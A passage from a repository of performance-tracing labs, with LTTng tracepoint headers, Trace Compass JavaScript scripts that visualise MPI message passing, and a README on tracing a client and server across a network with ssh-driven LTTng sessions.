This makes sure that at 37 | // least one MPI_Send is initialized before all MPI_Recvs (again, to prevent 38 | // deadlock) 39 | if (world_rank == 0) { 40 | MPI_Recv(&token, 1, MPI_INT, world_size - 1, 0, MPI_COMM_WORLD, 41 | MPI_STATUS_IGNORE); 42 | printf("Process %d received token %d from process %d\n", world_rank, token, 43 | world_size - 1); 44 | } 45 | MPI_Finalize(); 46 | } 47 | -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/code/ring_tp.c: -------------------------------------------------------------------------------- 1 | #define TRACEPOINT_CREATE_PROBES 2 | 3 | #include "ring_tp.h" 4 | -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/code/ring_tp.h: -------------------------------------------------------------------------------- 1 | #undef TRACEPOINT_PROVIDER 2 | #define TRACEPOINT_PROVIDER ring 3 | 4 | #undef TRACEPOINT_INCLUDE 5 | #define TRACEPOINT_INCLUDE "./ring_tp.h" 6 | 7 | #if !defined(_RING_TP_H) || defined(TRACEPOINT_HEADER_MULTI_READ) 8 | #define _RING_TP_H 9 | 10 | #include <lttng/tracepoint.h> 11 | 12 | /* An event */ 13 | TRACEPOINT_EVENT( 14 | /* Tracepoint provider name */ 15 | ring, 16 | /* Tracepoint class name */ 17 | init, 18 | /* Input arguments */ 19 | TP_ARGS( 20 | int, worker_id 21 | ), 22 | /* Output event fields */ 23 | TP_FIELDS( 24 | ctf_integer(int, worker_id, worker_id) 25 | ) 26 | ) 27 | 28 | TRACEPOINT_EVENT( 29 | ring, 30 | recv_exit, 31 | TP_ARGS( 32 | int, worker_id 33 | ), 34 | TP_FIELDS( 35 | ctf_integer(int, source, worker_id) 36 | ) 37 | ) 38 | 39 | TRACEPOINT_EVENT( 40 | ring, 41 | send_entry, 42 | TP_ARGS( 43 | int, worker_id 44 | ), 45 | TP_FIELDS( 46 | ctf_integer(int, dest, worker_id) 47 | ) 48 | ) 49 | 50 | /* The tracepoint class */ 51 | TRACEPOINT_EVENT_CLASS( 52 | /* Tracepoint provider name */ 53 | ring, 54 | /* Tracepoint class name */ 55 | no_field, 56 | /* Input arguments */ 57 | TP_ARGS( 58 | 59 | ), 60 | /* Output event fields */ 61 | TP_FIELDS( 62 | 63 | ) 64 | ) 65 | 66 | /* Trace point instance of the no_field class */ 67 | TRACEPOINT_EVENT_INSTANCE( 68 | ring, 69 | no_field, 70 | recv_entry, 71 | TP_ARGS( 72 | 73 | ) 74 | ) 75 | 76 | TRACEPOINT_EVENT_INSTANCE( 77 | ring, 78 | no_field, 79 | send_exit, 80 | TP_ARGS( 81 | 82 | ) 83 | ) 84 | 85 | #endif /* _RING_TP_H */ 86 | 87 | #include <lttng/tracepoint-event.h> 88 | -------------------------------------------------------------------------------- /labs/203-custom-userspace-instrumentation-in-c/screenshots/originalCode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/203-custom-userspace-instrumentation-in-c/screenshots/originalCode.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/changeJavascriptEngine.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/changeJavascriptEngine.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/customTraceOpened.png: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/customTraceOpened.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/enginesAndModules.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/enginesAndModules.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/installPlugIn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/installPlugIn.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/newFile.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/newFile.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/newFileName.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/newFileName.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/runAsScript.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/runAsScript.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptOutputConsole.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptOutputConsole.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptOutputEventsConsole.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptOutputEventsConsole.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptedTimeGraph.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptedTimeGraph.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptedTimeGraphArrows.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/scriptedTimeGraphArrows.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/screenshots/stateSystemExplorer.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/labs/204-scripted-analysis-for-custom-instrumentation/screenshots/stateSystemExplorer.png -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/scripts/step1_readTrace.js: -------------------------------------------------------------------------------- 1 | /* The MIT License (MIT) 2 | * 3 | * Copyright (C) 2019 - Geneviève Bastien 4 | * Copyright (C) 2019 - École Polytechnique de Montréal 5 | */ 6 | 7 | // Load the proper modules 8 | loadModule("/TraceCompass/Trace") 9 | 10 | // Get the active trace 11 | var trace = getActiveTrace() 12 | 13 | // Get an event iterator on that trace 14 | var iter = getEventIterator(trace) 15 | 16 | // Iterate through the events 17 | var event = null 18 | while (iter.hasNext()) { 19 | event = iter.next() 20 | 21 | // For each event, print the name and the field names 22 | eventString = event.getName() + " --> ( " 23 | 24 | var fieldsIterator = event.getContent().getFieldNames().iterator() 25 | while (fieldsIterator.hasNext()) { 26 | eventString += fieldsIterator.next() + " " 27 | } 28 | eventString += ")" 29 | 30 | print(eventString); 31 | } 32 | -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/scripts/step2_readEvents.js: -------------------------------------------------------------------------------- 1 | /* The MIT License (MIT) 2 | * 3 | * Copyright (C) 2019 - Geneviève Bastien 4 | * Copyright (C) 2019 - École Polytechnique de Montréal 5 | */ 6 | 7 | // Load the proper modules 8 | loadModule("/TraceCompass/Trace") 9 | 10 | // Get the active trace 11 | var trace = getActiveTrace() 12 | 13 | // Get an event iterator on that trace 14 | var iter = getEventIterator(trace) 15 | // Associate a TID with an mpi worker 16 | var tidToWorkerMap = {}; 17 | 18 | // Iterate through the events 19 | var event = null 20 | while (iter.hasNext()) { 21 | event = iter.next() 22 | 23 | eventName = event.getName() 24 | if (eventName == "ring:init") { 25 | tid = getEventFieldValue(event, "context._vtid") 26 | worker_id = getEventFieldValue(event, "worker_id") 27 | tidToWorkerMap[tid] = worker_id 28 | print("Init -> tid: " + tid + ", worker_id: " + worker_id) 29 | } else if (eventName == "ring:recv_entry") { 30 | tid = getEventFieldValue(event, "context._vtid") 31 | worker_id = tidToWorkerMap[tid] 32 | print("Entering Reception -> tid: " + tid+ ", worker_id: " + worker_id) 33 | } else if (eventName == "ring:recv_exit") { 34 | tid = 
getEventFieldValue(event, "context._vtid") 35 | worker_id = tidToWorkerMap[tid] 36 | source = getEventFieldValue(event, "source") 37 | print("Exiting Reception -> tid: " + tid + ", worker_id: " + worker_id + ", source: " + source) 38 | } else if (eventName == "ring:send_entry") { 39 | tid = getEventFieldValue(event, "context._vtid") 40 | worker_id = tidToWorkerMap[tid] 41 | dest = getEventFieldValue(event, "dest") 42 | print("Entering Send -> tid: " + tid + ", worker_id: " + worker_id + ", dest: " + dest) 43 | } else if (eventName == "ring:send_exit") { 44 | tid = getEventFieldValue(event, "context._vtid") 45 | worker_id = tidToWorkerMap[tid] 46 | print("Exiting Send -> tid: " + tid + ", worker_id: " + worker_id) 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/scripts/step3_stateSystem.js: -------------------------------------------------------------------------------- 1 | /* The MIT License (MIT) 2 | * 3 | * Copyright (C) 2019 - Geneviève Bastien 4 | * Copyright (C) 2019 - École Polytechnique de Montréal 5 | */ 6 | 7 | // Load the proper modules 8 | loadModule("/TraceCompass/Trace") 9 | loadModule("/TraceCompass/Analysis") 10 | 11 | // Get the active trace 12 | var trace = getActiveTrace() 13 | 14 | // Get an event iterator on that trace 15 | var iter = getEventIterator(trace) 16 | // Associate a TID with an mpi worker 17 | var tidToWorkerMap = {}; 18 | 19 | //Get an analysis 20 | var analysis = createScriptedAnalysis(trace, "ringTimeLine.js") 21 | // Get the analysis's state system so we can fill it, false indicates to create a new state system even if one already exists 22 | var ss = analysis.getStateSystem(false); 23 | 24 | // Iterate through the events 25 | var event = null 26 | while (iter.hasNext()) { 27 | event = iter.next() 28 | 29 | eventName = event.getName() 30 | if (eventName == "ring:init") { 31 | tid = getEventFieldValue(event, "context._vtid") 32 | worker_id = getEventFieldValue(event, "worker_id") 33 | tidToWorkerMap[tid] = worker_id 34 | } else if (eventName == "ring:recv_entry") { 35 | tid = getEventFieldValue(event, "context._vtid") 36 | worker_id = tidToWorkerMap[tid] 37 | // Save the state of the resource as waiting for reception 38 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 39 | ss.modifyAttribute(event.getTimestamp().toNanos(), "Waiting for reception", quark); 40 | } else if (eventName == "ring:recv_exit") { 41 | tid = getEventFieldValue(event, "context._vtid") 42 | worker_id = tidToWorkerMap[tid] 43 | source = getEventFieldValue(event, "source") 44 | // Remove the waiting for reception state 45 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 46 | ss.removeAttribute(event.getTimestamp().toNanos(), quark); 47 | } else if (eventName == "ring:send_entry") { 48 | tid = getEventFieldValue(event, "context._vtid") 49 | worker_id = tidToWorkerMap[tid] 50 | dest = getEventFieldValue(event, "dest") 51 | // Save the state of the resource as sending 52 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 53 | ss.modifyAttribute(event.getTimestamp().toNanos(), "Sending", quark); 54 | } else if (eventName == "ring:send_exit") { 55 | tid = getEventFieldValue(event, "context._vtid") 56 | worker_id = tidToWorkerMap[tid] 57 | // Remove the sending for reception state 58 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 59 | ss.removeAttribute(event.getTimestamp().toNanos(), quark); 60 | } 61 | } 62 | 63 | // Done parsing the events, close the state system at the time of the last 
event, it needs to be done manually otherwise the state system will still be waiting for values and will not be considered finished building 64 | if (event != null) { 65 | ss.closeHistory(event.getTimestamp().toNanos()); 66 | } 67 | -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/scripts/step4_timeLine.js: -------------------------------------------------------------------------------- 1 | /* The MIT License (MIT) 2 | * 3 | * Copyright (C) 2019 - Geneviève Bastien 4 | * Copyright (C) 2019 - École Polytechnique de Montréal 5 | */ 6 | 7 | // Load the proper modules 8 | loadModule("/TraceCompass/Trace") 9 | loadModule("/TraceCompass/Analysis") 10 | loadModule("/TraceCompass/DataProvider") 11 | loadModule("/TraceCompass/View") 12 | 13 | // Get the active trace 14 | var trace = getActiveTrace() 15 | 16 | // Get an event iterator on that trace 17 | var iter = getEventIterator(trace) 18 | // Associate a TID with an mpi worker 19 | var tidToWorkerMap = {}; 20 | 21 | //Get an analysis 22 | var analysis = createScriptedAnalysis(trace, "ringTimeLine.js") 23 | // Get the analysis's state system so we can fill it, false indicates to create a new state system even if one already exists 24 | var ss = analysis.getStateSystem(false); 25 | 26 | // Iterate through the events 27 | var event = null 28 | while (iter.hasNext()) { 29 | event = iter.next() 30 | 31 | eventName = event.getName() 32 | if (eventName == "ring:init") { 33 | tid = getEventFieldValue(event, "context._vtid") 34 | worker_id = getEventFieldValue(event, "worker_id") 35 | tidToWorkerMap[tid] = worker_id 36 | } else if (eventName == "ring:recv_entry") { 37 | tid = getEventFieldValue(event, "context._vtid") 38 | worker_id = tidToWorkerMap[tid] 39 | // Save the state of the resource as waiting for reception 40 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 41 | ss.modifyAttribute(event.getTimestamp().toNanos(), "Waiting for reception", quark); 42 | } else if (eventName == "ring:recv_exit") { 43 | tid = getEventFieldValue(event, "context._vtid") 44 | worker_id = tidToWorkerMap[tid] 45 | source = getEventFieldValue(event, "source") 46 | // Remove the waiting for reception state 47 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 48 | ss.removeAttribute(event.getTimestamp().toNanos(), quark); 49 | } else if (eventName == "ring:send_entry") { 50 | tid = getEventFieldValue(event, "context._vtid") 51 | worker_id = tidToWorkerMap[tid] 52 | dest = getEventFieldValue(event, "dest") 53 | // Save the state of the resource as sending 54 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 55 | ss.modifyAttribute(event.getTimestamp().toNanos(), "Sending", quark); 56 | } else if (eventName == "ring:send_exit") { 57 | tid = getEventFieldValue(event, "context._vtid") 58 | worker_id = tidToWorkerMap[tid] 59 | // Remove the sending for reception state 60 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 61 | ss.removeAttribute(event.getTimestamp().toNanos(), quark); 62 | } 63 | } 64 | 65 | // Done parsing the events, close the state system at the time of the last event, it needs to be done manually otherwise the state system will still be waiting for values and will not be considered finished building 66 | if (event != null) { 67 | ss.closeHistory(event.getTimestamp().toNanos()); 68 | } 69 | 70 | //Get a time graph provider from this analysis, displaying all attributes 71 | //Create a map and fill it, because javascript map cannot use the EASE constants as keys 72 | var map = new 
java.util.HashMap(); 73 | map.put(ENTRY_PATH, '*'); 74 | provider = createTimeGraphProvider(analysis, map); 75 | if (provider != null) { 76 | // Open a time graph view displaying this provider 77 | openTimeGraphView(provider); 78 | } 79 | -------------------------------------------------------------------------------- /labs/204-scripted-analysis-for-custom-instrumentation/scripts/step5_timeGraphArrow.js: -------------------------------------------------------------------------------- 1 | /* The MIT License (MIT) 2 | * 3 | * Copyright (C) 2019 - Geneviève Bastien 4 | * Copyright (C) 2019 - École Polytechnique de Montréal 5 | */ 6 | 7 | // Load the proper modules 8 | loadModule("/TraceCompass/Trace") 9 | loadModule("/TraceCompass/Analysis") 10 | loadModule("/TraceCompass/DataProvider") 11 | loadModule("/TraceCompass/View") 12 | loadModule('/TraceCompass/Utils'); 13 | 14 | // Get the active trace 15 | var trace = getActiveTrace() 16 | 17 | // Get an event iterator on that trace 18 | var iter = getEventIterator(trace) 19 | // Associate a TID with an mpi worker 20 | var tidToWorkerMap = {}; 21 | 22 | //Get an analysis 23 | var analysis = createScriptedAnalysis(trace, "ringTimeLine.js") 24 | // Get the analysis's state system so we can fill it, false indicates to create a new state system even if one already exists 25 | var ss = analysis.getStateSystem(false); 26 | 27 | //Save information on the pending arrows 28 | var pendingArrows = {}; 29 | //Variable to save the arrow information 30 | var arrows = []; 31 | 32 | // Iterate through the events 33 | var event = null 34 | while (iter.hasNext()) { 35 | event = iter.next() 36 | 37 | eventName = event.getName() 38 | if (eventName == "ring:init") { 39 | tid = getEventFieldValue(event, "context._vtid") 40 | worker_id = getEventFieldValue(event, "worker_id") 41 | tidToWorkerMap[tid] = worker_id 42 | } else if (eventName == "ring:recv_entry") { 43 | tid = getEventFieldValue(event, "context._vtid") 44 | worker_id = tidToWorkerMap[tid] 45 | // Save the state of the resource as waiting for reception 46 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 47 | ss.modifyAttribute(event.getTimestamp().toNanos(), "Waiting for reception", quark); 48 | } else if (eventName == "ring:recv_exit") { 49 | tid = getEventFieldValue(event, "context._vtid") 50 | worker_id = tidToWorkerMap[tid] 51 | source = getEventFieldValue(event, "source") 52 | // Remove the waiting for reception state 53 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 54 | ss.removeAttribute(event.getTimestamp().toNanos(), quark); 55 | // Complete an arrow if the start was available 56 | pending = pendingArrows[worker_id]; 57 | if (pending != null) { 58 | // There is a pending arrow (ie send) for this message 59 | pendingArrows[worker_id] = null; 60 | pending["endTime"] = event.getTimestamp().toNanos(); 61 | arrows.push(pending); 62 | } 63 | 64 | } else if (eventName == "ring:send_entry") { 65 | tid = getEventFieldValue(event, "context._vtid") 66 | worker_id = tidToWorkerMap[tid] 67 | dest = getEventFieldValue(event, "dest") 68 | // Save the state of the resource as sending 69 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 70 | ss.modifyAttribute(event.getTimestamp().toNanos(), "Sending", quark); 71 | 72 | // Save a pending arrow 73 | pendingArrows[dest] = {"time" : event.getTimestamp().toNanos(), "source" : worker_id, "dest" : dest}; 74 | } else if (eventName == "ring:send_exit") { 75 | tid = getEventFieldValue(event, "context._vtid") 76 | worker_id = tidToWorkerMap[tid] 77 | // Remove the sending for 
reception state 78 | quark = ss.getQuarkAbsoluteAndAdd(worker_id); 79 | ss.removeAttribute(event.getTimestamp().toNanos(), quark); 80 | } 81 | } 82 | 83 | // Done parsing the events, close the state system at the time of the last event, it needs to be done manually otherwise the state system will still be waiting for values and will not be considered finished building 84 | if (event != null) { 85 | ss.closeHistory(event.getTimestamp().toNanos()); 86 | } 87 | 88 | // Get list wrappers from Trace Compass for the entries and arrows. The conversion between javascript list and java list is not direct, so we need a wrapper 89 | var tgEntries = createListWrapper(); 90 | var tgArrows = createListWrapper(); 91 | 92 | /* Prepare the time graph data, there is few enough entries and arrows that it can be done once and returned once */ 93 | 94 | // Map the worker ID to an entry ID 95 | var mpiWorkerToId = {}; 96 | 97 | // Get all the quarks of the entries 98 | quarks = ss.getQuarks("*"); 99 | // Prepare the entries 100 | var mpiEntries = []; 101 | for (i = 0; i < quarks.size(); i++) { 102 | quark = quarks.get(i); 103 | // Get the mpi worker ID, and find its quark 104 | mpiWorkerId = ss.getAttributeName(quark); 105 | // Create an entry with the worker ID as name and the quark. The quark will be used to populate the entry's data. 106 | entry = createEntry(mpiWorkerId, {'quark' : quark}); 107 | mpiWorkerToId[mpiWorkerId] = entry.getId(); 108 | mpiEntries.push(entry); 109 | } 110 | // Sort the entries numerically 111 | mpiEntries.sort(function(a,b){return Number(a.getName()) - Number(b.getName())}); 112 | // Add the entries to the entry list 113 | for (i = 0; i < mpiEntries.length; i++) { 114 | tgEntries.getList().add(mpiEntries[i]); 115 | } 116 | 117 | // Prepare the arrows 118 | for (i=0; i < arrows.length; i++) { 119 | arrow = arrows[i]; 120 | 121 | // For each arrow, we get the source and destination entry ID from its mpi worker ID 122 | srcId = mpiWorkerToId[arrow["source"]]; 123 | dstId = mpiWorkerToId[arrow["dest"]]; 124 | // Get the start time and calculate the duration 125 | startTime = arrow["time"]; 126 | duration = arrow["endTime"] - startTime; 127 | // Add the arrow to the arrows list 128 | tgArrows.getList().add(createArrow(srcId, dstId, startTime, duration, 1)); 129 | } 130 | 131 | // A function used to return the entries to the data provider. It receives the filter in parameter, which contains the requested time range and any additional information 132 | function getEntries(parameters) { 133 | // The list is static once built, return all entries 134 | return tgEntries.getList(); 135 | } 136 | 137 | // A function used to return the arrows to the data provider. It receives the filter in parameter, which contains the requested time range and any additional information 138 | function getArrows(parameters) { 139 | // Just return all the arrows, the view will take those in the range 140 | return tgArrows.getList(); 141 | } 142 | 143 | // Create a scripted data provider for this analysis, using script functions to get the entries, row model data and arrows. 
Since the entries have a quark associated with them which contains the data to display, there is no need for a scripted getRowData function, so we send null 144 | provider = createScriptedTimeGraphProvider(analysis, getEntries, null, getArrows); 145 | if (provider != null) { 146 | // Open a time graph view displaying this provider 147 | openTimeGraphView(provider); 148 | } 149 | -------------------------------------------------------------------------------- /labs/301-tracing-multiple-machines/README.md: -------------------------------------------------------------------------------- 1 | ## Tracing System On Multiple Machines Across a Network 2 | 3 | In this lab, you will learn to record traces on multiple machines that communicate over the network, and how Trace Compass can analyze traces coming from different machines with different clocks. 4 | 5 | *Pre-requisites*: This lab is a follow-up of the [Tracing wget](../102-tracing-wget-critical-path) lab: we obtained 2 traces of wgetting the same web page twice. We saw that the 2 requests had very different durations. Now, we will also trace the machine serving the website, to see what happens on the server side during this request. For this lab, you can use the traces provided in this repository. The lab explains how to generate your own traces, but to do so, you would need 2 machines, preferably physical machines, as clocks on virtual machines are a bit trickier. 6 | 7 | - - - 8 | 9 | ### Task 1: Getting the trace 10 | 11 | While it is easy to just start an lttng session on one machine and obtain a local trace, tracing multiple machines requires more operations to control tracing and collect the traces afterwards. Unfortunately, there is no single blessed way of doing this; everyone develops their own techniques and writes their own scripts. 12 | 13 | The easiest way is to start tracing manually on each machine, run your workload, then stop the tracing. Of course, doing it fully manually will result in traces that are longer than necessary if the workload is small, like in this case, but it can be a good approach to capture a situation that may happen in the coming minutes. Scripting the tracing will produce smaller traces that span just the necessary time. 14 | 15 | We'll describe one possible approach to this kind of tracing here. We will trace 2 machines, one acting as a client (running the wget commands) and the other as a server (serving the requests); the tracing will be controlled from the client. We'll be using the 3 following bash scripts, which are also available in the [scripts](scripts/) directory: 16 | 17 | On the **server machine**, place the following script somewhere. We'll put it in the home ``~/`` directory and call it [`setupKernelTrace`](scripts/setupKernelTrace). This **creates a tracing session** with all required events. The trace will be saved to the trace directory passed as a parameter (this makes it easy to know where the trace is located, and thus how to retrieve it later); otherwise a name based on the date will be computed for the trace.
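For reference, here is roughly how this script will be driven from the client later in this lab; the user, host and session name below are just the example values used further down, and the complete client-side script is shown a little further in this section:

```
ssh myUser@5.5.5.2 ./setupKernelTrace serverTrace   # create the session and enable the events
ssh myUser@5.5.5.2 lttng start                      # start recording on the server
# ... run the workload from the client ...
ssh myUser@5.5.5.2 lttng destroy                    # stop the session and finalize the trace
```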
18 | 19 | ``` 20 | #!/bin/bash 21 | 22 | NAME=$1 23 | 24 | if [ -z "$NAME" ] 25 | then 26 | NAME=trace_$(date +"%y%m%d_%H%M") 27 | fi 28 | 29 | lttng create --output ~/lttng-traces/$NAME 30 | lttng enable-channel --kernel --num-subbuf 8 --subbuf-size 1024K more-subbuf 31 | # scheduling 32 | lttng enable-event -k --channel more-subbuf sched_switch,sched_waking,sched_pi_setprio,sched_process_fork,sched_process_exit,sched_process_free,sched_wakeup 33 | lttng enable-event -k --channel more-subbuf irq_softirq_entry,irq_softirq_raise,irq_softirq_exit 34 | lttng enable-event -k --channel more-subbuf irq_handler_entry,irq_handler_exit 35 | lttng enable-event -k --channel more-subbuf --syscall --all 36 | lttng enable-event -k --channel more-subbuf lttng_statedump_process_state,lttng_statedump_start,lttng_statedump_end,lttng_statedump_network_interface,lttng_statedump_block_device,lttng_statedump_interrupt 37 | # Block I/O 38 | lttng enable-event -k --channel more-subbuf block_rq_complete,block_rq_insert,block_rq_issue 39 | lttng enable-event -k --channel more-subbuf block_bio_frontmerge,sched_migrate,sched_migrate_task 40 | # cpu related 41 | lttng enable-event -k --channel more-subbuf power_cpu_frequency 42 | # network events 43 | lttng enable-event -k --channel more-subbuf net_dev_queue,netif_receive_skb,net_if_receive_skb 44 | # timer events 45 | lttng enable-event -k --channel more-subbuf timer_hrtimer_start,timer_hrtimer_cancel,timer_hrtimer_expire_entry,timer_hrtimer_expire_exit 46 | # Additional events for wifi 47 | #lttng enable-event -k --channel more-subbuf --function netif_receive_skb_internal netif_receive_skb_internal 48 | #lttng enable-event -k --channel more-subbuf --function do_IRQ do_IRQ 49 | 50 | ``` 51 | 52 | On the **client machine**, the following script will start the tracing on the server, record a trace of the payload, then stop the tracing on the server and copy the remote trace to this machine. We'll run it from a directory of your choice and save it as [`traceClientServer`](scripts/traceClientServer). 53 | 54 | ``` 55 | #!/bin/bash 56 | 57 | USER=$1 58 | SERVER=$2 59 | URL=$3 60 | if [ -z "$USER" ] || [ -z "$SERVER" ] || [ -z "$URL" ] 61 | then 62 | echo "Usage: ./traceClientServer <user> <server> <url>" 63 | echo "" 64 | echo "Example: ./traceClientServer myUser 5.5.5.2 http://www.polymtl.ca" 65 | exit 0 66 | fi 67 | 68 | TRACE_NAME=serverTrace 69 | 70 | # Start tracing on the server side through ssh 71 | ssh $USER@$SERVER ./setupKernelTrace $TRACE_NAME 72 | ssh $USER@$SERVER lttng start 73 | # Record the client payload 74 | # If the client is a machine with wifi, replace this call with a full manual setup 75 | # of the kernel trace and uncomment the additional kernel --function lines 76 | lttng-record-trace ./payload $URL 77 | # Stop tracing the server 78 | ssh $USER@$SERVER lttng destroy 79 | 80 | # Get the trace from the server 81 | rsync -avz $USER@$SERVER:~/lttng-traces/$TRACE_NAME ./ 82 | ``` 83 | 84 | Finally, the following [`payload`](scripts/payload) script on the **client machine** will contain the payload to trace, here 2 wgets of a web site. This script should be in the same directory as the previous one. 85 | 86 | ``` 87 | #!/bin/bash 88 | 89 | SITE=$1 90 | 91 | wget $SITE 92 | sleep 1 93 | wget $SITE 94 | 95 | ``` 96 | 97 | After running those scripts, you should have 2 traces in your working directory: one called ``payLoad-`` and one called ``serverTrace``, from the client and the server respectively.
These 2 traces will be imported into Trace Compass in the next step. 98 | 99 | :grey_exclamation: If one of the machines connects to the network through wifi, the traces taken with the default events will not show the critical path through the network. For that, additional events will be required. For now, with lttng 2.11 and below, **tracing the following kernel functions** should make the dependency analyses possible: 100 | 101 | ``` 102 | lttng enable-event -k --channel more-subbuf --function netif_receive_skb_internal netif_receive_skb_internal 103 | lttng enable-event -k --channel more-subbuf --function do_IRQ do_IRQ 104 | ``` 105 | 106 | - - - 107 | 108 | ### Task 2: Importing the traces in an experiment 109 | 110 | In Trace Compass, under the project into which to import the traces, right-click on the `Traces` folder. Select `Import...` to open the *Trace Import* wizard. 111 | 112 | Browse for the folder containing the traces, then check each folder containing a trace on the left side. You should have two folders checked. In the options below, make sure the **Create experiment** option is checked, with an experiment name in the textbox beside the option, as shown in the screenshot below. 113 | 114 | ![ImportExperiment](screenshots/importExperiment.png "Trace Compass Import Experiment") 115 | 116 | The traces will be imported. Then expand the *Experiments* folder to see the experiment that was just created with the 2 traces in it. Double-click on the experiment to open it. 117 | 118 | ![OpenExperiment](screenshots/openExperiment.png "Trace Compass Open Experiment") 119 | 120 | If you are using the traces provided with the tutorial, the ones we'll be using now are in the `301-tracing-multiple-machines` folder: `httpClient` and `httpServer`. To create an experiment with those 2, you can select them (by pressing `ctrl-left-click` on their names), then `right-click` and select `Open As Experiment...` -> `Generic Experiment`. It will automatically open the experiment with the 2 traces in it. 121 | 122 | ![OpenAsExperiment](screenshots/openAsExperiment.png "Trace Compass Open As Experiment") 123 | 124 | - - - 125 | 126 | ### Task 3: Synchronizing the traces 127 | 128 | The 2 traces were taken on different machines that communicated together using HTTP to get the web page. This means there will be events in the traces representing the exchange of TCP/IP packets, namely ``net_dev_queue`` and ``net[_]if_receive_skb`` for sending and receiving packets. The data in those events makes it possible to match the sending event on one machine with the corresponding reception event on the other machine. 129 | 130 | Under the experiment, expand *Views*. There is an analysis called ``Event Matching Latency``. Expand it, then open the ``Event Matches Scatter Graph``. Make sure the trace is fully zoomed out; you should see two communication streams. Check them to see the latencies. This analysis matches send and receive events and shows the latency between the 2 events. 131 | 132 | Unless the 2 machines' clocks are perfectly synchronized, the 2 streams should appear as 2 very distinct series, one of which may even be negative. That means events are received before they are sent! 133 | 134 | ![EventMatchingNoSync](screenshots/eventMatchingNoSync.png "Event Matching Latencies No Sync") 135 | 136 | If the 2 machines are physical machines, they are independent and what happens on one does not affect the other.
